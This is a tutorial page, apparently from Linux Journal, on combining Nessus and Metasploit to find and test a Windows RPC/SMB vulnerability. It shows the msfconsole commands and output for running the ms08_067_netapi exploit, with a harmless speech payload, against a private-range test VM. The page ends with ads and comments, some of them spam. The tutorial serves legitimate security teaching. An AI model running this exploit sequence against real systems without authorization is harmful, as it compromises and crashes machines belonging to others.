Loading
A Penetration Tester's Toolkit
Take a look at the report in detail by clicking on the IP in the report. Here you will see a grid broken down by level of concern. As you can see, this very basic vulnerability scan returned a lot of good information. In particular, let's look at the RPC issue. Open that up and take a look at the listing (Figure 7).
Figure 7. A Lot Going on Here for a Fresh Build
What you can take away from this is that RPC is a service of concern and that Nessus by itself has an exploit against it. The plugin ID tells you which plugin to use to test the exploit; the name gives you some detail about the issue, and port and severity are self-explanatory. By clicking on the name, you pull up a window that provides plenty of detail, including what versions are affected, patches released to fix it and various other tidbits (Figure 8).
Figure 8. Detailed Results
This gives us plenty to work with, but let's make sure that we really can exploit this and that there is, indeed, cause for concern. You could do that with Nessus (give it a try!), but rather than relying solely on Nessus, let's bring in the final tool, the heavy-hitter Metasploit.
Why use two different tools that can do the same job? Preference, mostly. I find that Metasploit is much better suited for exploits than Nessus. That's not to say Nessus doesn't get the job done, but Metasploit was built specifically for this purpose. If nothing else, a third tool presents another compelling piece of evidence to support your findings. It never hurts to have an extra set of eyes.
Before going any further, I should say this: I have a ton of respect for the power behind Metasploit. Be sure to read all the documentation before ever attempting a run of Metasploit against a remotely used box. Metasploit is a lot of fun, but kind of in the way that fireworks are a lot of fun (obviously, accidents can happen if you're not careful).
Start by opening a terminal, su to root (if you have given a regular
user access to the proper files/directories for Metasploit, it's
best to run as said user instead of root), and run the command
msfconsole
(Figure 9).
Figure 9. Behold, Metasploit
Once you get a prompt back, the first thing to do is select your exploit to test. To see all available exploits, type the following, then go get a cup of coffee, because this takes a minute...or two:
show exploits
Okay, for the purpose of this example, let's use the following command (Figure 10 shows the results), which corresponds to the previous error shown from Nessus (Figure 8):
use exploit/windows/smb/ms08_067_netapi
Figure 10. Exploits Listed and Exploit Selected
You could use another exploit, which simply would crash the box, but let's try not to be too destructive. With your exploit selected, now you need to choose a payload. A payload is the set of instructions to send via the exploit to get the desired results. In this case, you want to broadcast a message to the computer. First, list your payloads by running the following:
show payloads
Next, select the payload by using the following command:
set payload windows/speak_pwned
Figure 11. Payload Selected
Finally, show the options for this payload to see what you need to append to this command to run the exploit. In this case, you need to give it the IP of the box in question (which makes sense—Metasploit is not a mind-reading tool). Listing 2 shows the output.
Listing 2. Output of Exploit
msf exploit(ms08_067_netapi) > set payload windows/speak_pwned
payload => windows/speak_pwned
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes Pipe name to use (BROWSER, SRVSVC)
Payload options (windows/speak_pwned):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(ms08_067_netapi) > exploit
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
As you can see, the exploit completed. And, if you have sound on your virtual machine, you will have heard something to the effect of "pwnd". If you take a look at the Windows machine, you will see that a service crashed in this exploit—a rather typical side effect (Figure 12).
Figure 12. We broke the box.
You could try a few other exploits (actually quite a few), but this gives you a good idea of how something simple like sending an audible could cause an issue. Again, be careful, and always play on a test box.
Conclusion
As you can see, these three tools, when used together, make for a powerful investigation and the basis for a good report. Used wisely, these tools can help defend your network against these very exploits. I often find myself simply using Nmap to do random scans on my subnet for new computers, Nessus to investigate further and find vulnerabilities, and Metasploit to disable the device if necessary (it happens more than you think). I also use these tools for generating reports, giving presentations to management and keeping my network healthy in general. I learn something new every time I run them, either about the tools themselves or my network, thus keeping it interesting. Give the tools a try and see what you think and enjoy!
Resources
Nmap: http://nmap.org
Metasploit: http://metasploit.com
Nessus: http://www.nessus.org
- « first
- ‹ previous
- 1
- 2
- 3
______________________
Matthew Agle is a 30-year-old senior architect. When he's not focusing on work, hacking, security, his blog or various other hobbies, he can be found playing with his kids and generally annoying his wife.
White Paper
Fabric-Based Computing Enables Optimized Hyperscale Data Centers
Today’s modular x86 servers are compute-centric, designed as a least common denominator to support a wide range of IT workloads. Those generic, virtualized IT workloads have much different resource optimization requirements than hyperscale and cloud applications. They have resulted in a “one size fits all” enterprise IT architecture that is not optimized for a specific set of IT workloads, and especially not emerging hyperscale workloads, such as web applications, big data, and object storage. In this report, you will learn how shifting the focus from traditional compute-centric IT architectures to an innovative disaggregated fabric-based architecture can optimize and scale your data center.
Sponsored by AMD
White Paper
Red Hat White Paper: Using an Open Source Framework to Catch the Bad Guy
Built-in forensics, incident response, and security with Red Hat Enterprise Linux 6
Every security policy provides guidance and requirements for ensuring adequate protection of information and data, as well as high-level technical and administrative security requirements for a system in a given environment. Traditionally, providing security for a system focuses on the confidentiality of the information on it. However, protecting the data integrity and system and data availability is just as important. For example, when processing United States intelligence information, there are three attributes that require protection: confidentiality, integrity, and availability.
Learn more about catching the bad guy in this free white paper.
Sponsored by DLT Solutions
- RSS Feeds
- Making Linux and Android Get Along (It's Not as Hard as It Sounds)
- New Products
- Drupal Is a Framework: Why Everyone Needs to Understand This
- A Topic for Discussion - Open Source Feature-Richness?
- Home, My Backup Data Center
- Validate an E-Mail Address with PHP, the Right Way
- Using Salt Stack and Vagrant for Drupal Development
- Tech Tip: Really Simple HTTP Server with Python
- New Products
- Ahh, the Koolaid.
11 min 29 sec ago - git-annex assistant
6 hours 11 min ago - direct cable connection
6 hours 33 min ago - Agreed on AirDroid. With my
6 hours 43 min ago - I just learned this
6 hours 48 min ago - enterprise
7 hours 18 min ago - not living upto the mobile revolution
10 hours 9 min ago - Deceptive Advertising and
10 hours 44 min ago - Let\'s declare that you have
10 hours 45 min ago - Alterations in Contest Due
10 hours 47 min ago
Free Webinar: Linux Backup and Recovery
Most companies incorporate backup procedures for critical data, which can be restored quickly if a loss occurs. However, fewer companies are prepared for catastrophic system failures, in which they lose all data, the entire operating system, applications, settings, patches and more, reducing their system(s) to “bare metal.” After all, before data can be restored to a system, there must be a system to restore it to.
In this one hour webinar, learn how to enhance your existing backup strategies for better disaster recovery preparedness using Storix System Backup Administrator (SBAdmin), a highly flexible bare-metal recovery solution for UNIX and Linux systems.
Comments
Great post .Thank you for
Great post .Thank you for this article.
I'm not really into networking, so being able to use such tools is very convenient to me... Temizlik şirketleri
The botheration I see is that
The botheration I see is that Microsoft bankrupt their own disciplinarian archetypal and a lot of humans are XP users still because they can't allow to bandy out all or a lot auto diagnostics of of their hardware. These humans don't apperceive about or accept alone Linux, conceivably because their in abode software will not plan beneath WINE. There is ReactOS, but ReactOS is not abiding and it is not adapted for day to day use yet.
Very cool article. I have
Very cool article. I have used all these tools (been a while since I used nessus though). Metasploit is awesome, but can be a little overwhelming to use. Nmap is amazing though and has a lot of great features and can be used for a bunch of different things. Great article thank you!
Nmap is a great tool for this
Nmap is a great tool for this type of work. Have you had a look at OpenVAS?
I think an article on OpenVAS would be a good follow up.
Thanx
Thank you for this article. A must read !
I'm not really into networking, so being able to use such tools is very convenient to me :)
Good Article. Should get
Good Article. Should get people interested enough to try these tools out.
As for ease of use metasploit also has a good frontend: Armitage.
Progress in engineering
Progress in engineering haven't left the car industry guiding. Do-it-yourself devices can be a issue of your earlier. You could no extra get less than the hood of auto diagnostics the auto to remove elements and put them jointly with out stressing in regards to the car's doing work. Now, fuel techniques, ignition timing, temperature sensors, and so on. are managed and supervised by way of sophisticated pc systems.
Your missing The
Your missing The Social-Engineer Toolkit -- One of the best ones out there as well. Good article!
Cool
This is really highly interesting, I tested this on the hosting account used for my website here and I must say the results were more than surprising. You pointed out a few details I never really cared about much. Really simple if you know the problem, which makes being aware even more important. To sum it up: Thanks :)